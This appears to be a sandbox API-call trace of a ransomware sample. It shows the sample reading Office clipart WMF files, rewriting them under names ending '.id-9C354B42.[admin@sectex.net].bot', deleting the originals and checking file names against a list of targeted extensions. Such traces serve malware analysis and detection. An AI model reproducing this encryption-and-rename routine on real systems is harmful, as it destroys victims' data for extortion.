	[0146.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0146.573] GetLastError () returned 0x0
	[0146.573] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x148c, lpOverlapped=0x0) returned 1
	[0146.575] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1490, lpOverlapped=0x0) returned 1
	[0146.576] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.576] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.576] SetEndOfFile (hFile=0x398) returned 1
	[0146.577] CloseHandle (hObject=0x398) returned 1
	[0146.577] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.577] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.579] CloseHandle (hObject=0x3d0) returned 1
	[0146.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf")) returned 1
	[0146.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString=".doc") returned 4
	[0146.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString=".docx") returned 5
	[0146.580] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.580] lstrlenW (lpString=".pdf") returned 4
	[0146.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString=".xls") returned 4
	[0146.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.580] lstrlenW (lpString=".xlsx") returned 5
	[0146.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.580] lstrlenW (lpString=".ppt") returned 4
	[0146.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString=".zip") returned 4
	[0146.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.580] lstrlenW (lpString=".rar") returned 4
	[0146.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString=".bz2") returned 4
	[0146.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString=".7z") returned 3
	[0146.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString=".dbf") returned 4
	[0146.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString=".1cd") returned 4
	[0146.580] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.580] lstrlenW (lpString=".jpg") returned 4
	[0146.580] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString=".doc") returned 4
	[0146.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString=".docx") returned 5
	[0146.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.581] lstrlenW (lpString=".pdf") returned 4
	[0146.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString=".xls") returned 4
	[0146.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.581] lstrlenW (lpString=".xlsx") returned 5
	[0146.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.581] lstrlenW (lpString=".ppt") returned 4
	[0146.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString=".zip") returned 4
	[0146.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.581] lstrlenW (lpString=".rar") returned 4
	[0146.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString=".bz2") returned 4
	[0146.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString=".7z") returned 3
	[0146.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString=".dbf") returned 4
	[0146.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString=".1cd") returned 4
	[0146.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 63
	[0146.581] lstrlenW (lpString=".jpg") returned 4
	[0146.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.582] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.582] lstrlenW (lpString="FD00564_.WMF") returned 12
	[0146.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.582] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=896) returned 1
	[0146.582] CloseHandle (hObject=0x3d0) returned 1
	[0146.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf")) returned 0x20
	[0146.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.583] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.583] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0146.583] GetLastError () returned 0x0
	[0146.583] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x380, lpOverlapped=0x0) returned 1
	[0146.586] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x390, lpOverlapped=0x0) returned 1
	[0146.587] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.587] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.587] SetEndOfFile (hFile=0x398) returned 1
	[0146.587] CloseHandle (hObject=0x398) returned 1
	[0146.587] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.587] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.591] CloseHandle (hObject=0x3d0) returned 1
	[0146.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.591] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf")) returned 1
	[0146.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.592] lstrlenW (lpString=".doc") returned 4
	[0146.592] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.592] lstrlenW (lpString=".docx") returned 5
	[0146.592] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.592] lstrlenW (lpString=".pdf") returned 4
	[0146.592] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.592] lstrlenW (lpString=".xls") returned 4
	[0146.592] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.592] lstrlenW (lpString=".xlsx") returned 5
	[0146.592] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.592] lstrlenW (lpString=".ppt") returned 4
	[0146.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.592] lstrlenW (lpString=".zip") returned 4
	[0146.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.592] lstrlenW (lpString=".rar") returned 4
	[0146.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.592] lstrlenW (lpString=".bz2") returned 4
	[0146.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.592] lstrlenW (lpString=".7z") returned 3
	[0146.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString=".dbf") returned 4
	[0146.593] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString=".1cd") returned 4
	[0146.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString=".jpg") returned 4
	[0146.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString=".doc") returned 4
	[0146.593] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString=".docx") returned 5
	[0146.593] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.593] lstrlenW (lpString=".pdf") returned 4
	[0146.593] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString=".xls") returned 4
	[0146.593] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.593] lstrlenW (lpString=".xlsx") returned 5
	[0146.593] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.593] lstrlenW (lpString=".ppt") returned 4
	[0146.593] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.593] lstrlenW (lpString=".zip") returned 4
	[0146.593] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.593] lstrlenW (lpString=".rar") returned 4
	[0146.593] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString=".bz2") returned 4
	[0146.593] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.593] lstrlenW (lpString=".7z") returned 3
	[0146.593] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.594] lstrlenW (lpString=".dbf") returned 4
	[0146.594] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.594] lstrlenW (lpString=".1cd") returned 4
	[0146.594] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63
	[0146.594] lstrlenW (lpString=".jpg") returned 4
	[0146.594] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.594] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.594] lstrlenW (lpString="FD00586_.WMF") returned 12
	[0146.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.594] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=752) returned 1
	[0146.594] CloseHandle (hObject=0x3d0) returned 1
	[0146.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf")) returned 0x20
	[0146.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.595] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.595] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0146.596] GetLastError () returned 0x0
	[0146.596] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2f0, lpOverlapped=0x0) returned 1
	[0146.704] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x300, lpOverlapped=0x0) returned 1
	[0146.705] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.705] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.705] SetEndOfFile (hFile=0x398) returned 1
	[0146.705] CloseHandle (hObject=0x398) returned 1
	[0146.705] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.705] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.707] CloseHandle (hObject=0x3d0) returned 1
	[0146.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf")) returned 1
	[0147.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.009] lstrlenW (lpString=".doc") returned 4
	[0147.009] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.009] lstrlenW (lpString=".docx") returned 5
	[0147.009] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.010] lstrlenW (lpString=".pdf") returned 4
	[0147.010] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString=".xls") returned 4
	[0147.010] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.010] lstrlenW (lpString=".xlsx") returned 5
	[0147.010] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.010] lstrlenW (lpString=".ppt") returned 4
	[0147.010] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString=".zip") returned 4
	[0147.010] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.010] lstrlenW (lpString=".rar") returned 4
	[0147.010] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString=".bz2") returned 4
	[0147.010] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString=".7z") returned 3
	[0147.010] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString=".dbf") returned 4
	[0147.010] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString=".1cd") returned 4
	[0147.010] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString=".jpg") returned 4
	[0147.010] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.010] lstrlenW (lpString=".doc") returned 4
	[0147.010] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString=".docx") returned 5
	[0147.011] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.011] lstrlenW (lpString=".pdf") returned 4
	[0147.011] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString=".xls") returned 4
	[0147.011] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.011] lstrlenW (lpString=".xlsx") returned 5
	[0147.011] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.011] lstrlenW (lpString=".ppt") returned 4
	[0147.011] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.011] lstrlenW (lpString=".zip") returned 4
	[0147.011] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.011] lstrlenW (lpString=".rar") returned 4
	[0147.011] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString=".bz2") returned 4
	[0147.011] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString=".7z") returned 3
	[0147.011] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.011] lstrlenW (lpString=".dbf") returned 4
	[0147.011] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.011] lstrlenW (lpString=".1cd") returned 4
	[0147.011] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63
	[0147.011] lstrlenW (lpString=".jpg") returned 4
	[0147.011] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.012] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.012] lstrlenW (lpString="FD01084_.WMF") returned 12
	[0147.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.012] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2412) returned 1
	[0147.012] CloseHandle (hObject=0x3a0) returned 1
	[0147.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf")) returned 0x20
	[0147.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.013] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.013] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
